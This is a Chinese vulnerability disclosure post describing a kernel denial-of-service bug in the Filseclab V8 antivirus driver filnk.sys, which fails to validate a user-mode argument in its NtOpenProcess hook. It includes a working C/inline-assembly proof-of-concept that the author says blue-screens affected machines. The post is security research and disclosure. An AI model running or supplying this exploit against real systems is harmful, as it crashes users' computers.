费尔V8智能杀毒多处内核拒绝服务漏洞
来源:互联网 发布:linux tomcat 日志 编辑:程序博客网 时间:2024/05/01 18:17
V8藏着掖着搞了这么多年,除了主界面弄了个毫无用处的动画外,其他附加的程序,例如“隔离区”,“日志管理器”等都是老版本的程序,感觉连个人作品都不如,山寨中的战斗机。哎,让吾等正版用户及其失望。
V8杀毒软件的动态防御驱动filnk.sys在内核对多个系统函数进行了hook,但是对Ring3传递进来的参数都没有任何的有效性检查就直接使用了。因此,造成了内核拒绝服务漏洞。
这里以其Hook的NtOpenProcess为例,函数偏移6A8C0,NtOpenProcess原型如下:
NTSTATUSNtOpenProcess ( __out PHANDLE ProcessHandle, __in ACCESS_MASK DesiredAccess, __in POBJECT_ATTRIBUTES ObjectAttributes, __in_opt PCLIENT_ID ClientId )
hook函数出问题部分如下:
如上图可以看出,Ring3传递进来的ClientId参数,其在内核中就直接使用了,并没有做任何有效性检查。
测试代码:
/* 作者:莫灰灰 博客:http://blog.csdn.net/hu3167343 描述:费尔V8智能杀毒内核拒绝服务漏洞测试程序*/#include "stdafx.h"#include <windows.h>int _tmain(int argc, _TCHAR* argv[]){ HMODULE hMod = LoadLibrary(L"ntdll.dll"); if (hMod) { PVOID p = GetProcAddress(hMod, "ZwOpenProcess"); if (p) { printf("Your System Will Crash, Press any key to Continue.\n"); getchar(); __asm{ push 0x80000000 push 0 push 1 push 0 call p } } } return 0;}ps:在安装了费尔V8,并且开启了主动防御的机器上运行上述程序,即刻蓝屏重启。
- 费尔V8智能杀毒多处内核拒绝服务漏洞
- GKR阳光版 RegFilter.sys<=2.0.00 多处内核拒绝服务漏洞
- 瑞星2011、2012神马的各种内核拒绝服务漏洞
- PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞
- 【推荐】锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
- Linux Kernel拒绝服务漏洞
- 短信拒绝服务漏洞
- Apache曝HashTable碰撞拒绝服务漏洞,Java、PHP、Asp.Net及v8引擎等都受影响
- FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞
- 关于QQ的拒绝服务漏洞
- OpenSSH远程PAM拒绝服务漏洞
- Apache Log4Net远程拒绝服务漏洞
- android中通用拒绝服务漏洞
- MongoDB BSON 远程拒绝服务漏洞
- Android本地拒绝服务漏洞浅析
- Linux Kernel kNFSd 整数溢出 拒绝服务漏洞
- MySQL数据库IF查询远程拒绝服务漏洞
- Proftpd 记忆体泄漏拒绝服务攻击漏洞
- 最新Centos linux MySQL修改root密码的N种方法
- 墨卡托投影
- 在 aix,hp-ux的 shell中取前N天的时间
- 手工写MFC应用程序
- Nginx的Upload上传模块
- 费尔V8智能杀毒多处内核拒绝服务漏洞
- 今天开始记录我的嵌入式学习历程
- ubuntu 设置 中文 MAN
- C++内存管理(一)介绍
- matlab计时函数
- Ubuntu下Vim的配置
- SAP 复制移动类型提示"在工作区中指定关键字"
- OOP与AOP的区别与联系
- 行销知识学习笔记